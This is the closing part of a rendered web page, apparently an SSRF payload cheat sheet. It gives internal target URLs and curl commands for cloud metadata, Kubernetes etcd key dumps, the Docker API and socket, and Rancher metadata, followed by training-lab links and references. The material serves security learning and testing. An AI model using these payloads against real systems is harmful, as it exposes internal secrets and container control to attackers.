<a id="__codelineno-64-2" name="__codelineno-64-2" href="#__codelineno-64-2"></a><span class="n">http</span><span class="p">://</span><span class="n">100</span><span class="p">.</span><span class="n">100</span><span class="p">.</span><span class="n">100</span><span class="p">.</span><span class="n">200</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">instance-id</span>
<a id="__codelineno-64-3" name="__codelineno-64-3" href="#__codelineno-64-3"></a><span class="n">http</span><span class="p">://</span><span class="n">100</span><span class="p">.</span><span class="n">100</span><span class="p">.</span><span class="n">100</span><span class="p">.</span><span class="n">200</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">image-id</span>
</code></pre></div>
<h3 id="ssrf-url-for-kubernetes-etcd">SSRF URL for Kubernetes ETCD</h3>
<p>etcd can contain API keys and internal IP addresses and ports, so its client port should not be reachable without authentication.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-65-1" name="__codelineno-65-1" href="#__codelineno-65-1"></a><span class="nb">curl </span><span class="n">-L</span> <span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">2379</span><span class="p">/</span><span class="n">version</span>
<a id="__codelineno-65-2" name="__codelineno-65-2" href="#__codelineno-65-2"></a><span class="nb">curl </span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">2379</span><span class="p">/</span><span class="n">v2</span><span class="p">/</span><span class="n">keys</span><span class="p">/</span><span class="k">?</span><span class="n">recursive</span><span class="p">=</span><span class="n">true</span>
</code></pre></div>
<h3 id="ssrf-url-for-docker">SSRF URL for Docker</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-66-1" name="__codelineno-66-1" href="#__codelineno-66-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">2375</span><span class="p">/</span><span class="n">v1</span><span class="p">.</span><span class="n">24</span><span class="p">/</span><span class="n">containers</span><span class="p">/</span><span class="n">json</span>
<a id="__codelineno-66-2" name="__codelineno-66-2" href="#__codelineno-66-2"></a>
<a id="__codelineno-66-3" name="__codelineno-66-3" href="#__codelineno-66-3"></a><span class="n">Simple</span> <span class="n">example</span>
<a id="__codelineno-66-4" name="__codelineno-66-4" href="#__codelineno-66-4"></a><span class="n">docker</span> <span class="n">run</span> <span class="n">-ti</span> <span class="n">-v</span> <span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">run</span><span class="p">/</span><span class="n">docker</span><span class="p">.</span><span class="n">sock</span><span class="p">:/</span><span class="n">var</span><span class="p">/</span><span class="n">run</span><span class="p">/</span><span class="n">docker</span><span class="p">.</span><span class="n">sock</span> <span class="n">bash</span>
<a id="__codelineno-66-5" name="__codelineno-66-5" href="#__codelineno-66-5"></a><span class="n">bash</span><span class="p">-</span><span class="n">4</span><span class="p">.</span><span class="n">4</span><span class="c"># curl --unix-socket /var/run/docker.sock http://foo/containers/json</span>
<a id="__codelineno-66-6" name="__codelineno-66-6" href="#__codelineno-66-6"></a><span class="n">bash</span><span class="p">-</span><span class="n">4</span><span class="p">.</span><span class="n">4</span><span class="c"># curl --unix-socket /var/run/docker.sock http://foo/images/json</span>
</code></pre></div>
<p>More info:</p>
<ul>
<li>Daemon socket option: https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-socket-option</li>
<li>Docker Engine API: https://docs.docker.com/engine/api/latest/</li>
</ul>
<h3 id="ssrf-url-for-rancher">SSRF URL for Rancher</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-67-1" name="__codelineno-67-1" href="#__codelineno-67-1"></a><span class="nb">curl </span><span class="n">http</span><span class="p">://</span><span class="n">rancher-metadata</span><span class="p">/&lt;</span><span class="n">version</span><span class="p">&gt;/&lt;</span><span class="n">path</span><span class="p">&gt;</span>
</code></pre></div>
<p>More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/</p>
<h2 id="labs">Labs</h2>
<ul>
<li><a href="https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost">Basic SSRF against the local server</a></li>
<li><a href="https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system">Basic SSRF against another back-end system</a></li>
<li><a href="https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter">SSRF with blacklist-based input filter</a></li>
<li><a href="https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter">SSRF with whitelist-based input filter</a></li>
<li><a href="https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection">SSRF with filter bypass via open redirection vulnerability</a></li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf">AppSecEU15-Server_side_browsing_considered_harmful.pdf</a></li>
<li><a href="https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/">Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13</a></li>
<li><a href="http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/">ESEA Server-Side Request Forgery and Querying AWS Meta Data</a> by Brett Buerhaus</li>
<li><a href="https://hackerone.com/reports/115857">SSRF and local file read in video to gif converter</a></li>
<li><a href="https://hackerone.com/reports/115748">SSRF in https://imgur.com/vidgif/url</a></li>
<li><a href="https://hackerone.com/reports/358119">SSRF in proxy.duckduckgo.com</a></li>
<li><a href="https://hackerone.com/reports/374737">Blind SSRF on errors.hackerone.net</a></li>
<li><a href="https://hackerone.com/reports/382612">SSRF on *shopifycloud.com</a></li>
<li><a href="https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF">Hackerone - How To: Server-Side Request Forgery (SSRF)</a></li>
<li><a href="https://twitter.com/albinowax/status/890725759861403648">Awesome URL abuse for SSRF by @orange_8361 #BHUSA</a></li>
<li><a href="http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html">How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai</a></li>
<li><a href="https://www.youtube.com/watch?v=D1S-G8rJrEk">#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai</a></li>
<li><a href="http://blog.safebuff.com/2016/07/03/SSRF-Tips/">SSRF Tips - xl7dev</a></li>
<li><a href="https://hackerone.com/reports/115748">SSRF in https://imgur.com/vidgif/url</a></li>
<li><a href="https://www.dailysecurity.fr/server-side-request-forgery/">Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat</a></li>
<li><a href="http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf">AppSecEU15 Server side browsing considered harmful - @Agarri</a></li>
<li><a href="https://twitter.com/EdOverflow">Enclosed alphanumerics - @EdOverflow</a></li>
<li><a href="http://www.sxcurity.pro/2017/12/17/hackertarget/">Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity</a></li>
<li><a href="https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51">PHP SSRF @secjuice</a></li>
<li><a href="https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158">How I convert SSRF to xss in a ssrf vulnerable Jira</a></li>
<li><a href="https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a">Piercing the Veil: Server Side Request Forgery to NIPRNet access</a></li>
<li><a href="https://www.youtube.com/watch?v=66ni2BTIjS8">Hacker101 SSRF</a></li>
<li><a href="https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/">SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例</a></li>
<li><a href="https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978">SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019</a></li>
<li><a href="https://www.silentrobots.com/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/">SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst</a></li>
<li><a href="https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/">X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang</a></li>
<li><a href="https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/">Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure</a></li>
<li><a href="https://portswigger.net/web-security/ssrf">PortSwigger - Web Security Academy Server-side request forgery (SSRF)</a></li>
<li><a href="https://github.com/allanlw/svg-cheatsheet">SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019</a></li>
<li><a href="https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/">SSRFs up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019</a></li>
<li><a href="https://www.kieranclaessens.be/cscbe-web-2018.html">challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!</a></li>
<li><a href="https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/">Attacking Url's in JAVA</a></li>
<li><a href="https://twitter.com/thedawgyg/status/1224547692967342080">SSRF: Don't encode entire IP</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1-2.1-2M12.5 7v5.2l4 2.4-1 1L11 13V7h1.5M11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2v1.8Z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">August 25, 2023</span>
</span>
</aside>
</article>
</div>
<script>
// Look up the element whose id matches the URL fragment (without the leading "#").
// If it exists and has a `name`, set its `checked` state to whether that name
// begins with "__tabbed_".
var target = document.getElementById(location.hash.slice(1));
if (target && target.name) {
  target.checked = target.name.startsWith("__tabbed_");
}
</script>
</div>
</main>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"base": "..", "features": ["content.code.copy", "navigation.tracking", "navigation.top"], "search": "../assets/javascripts/workers/search.b8dbb3d2.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../assets/javascripts/bundle.bd41221c.min.js"></script>
</body>
</html>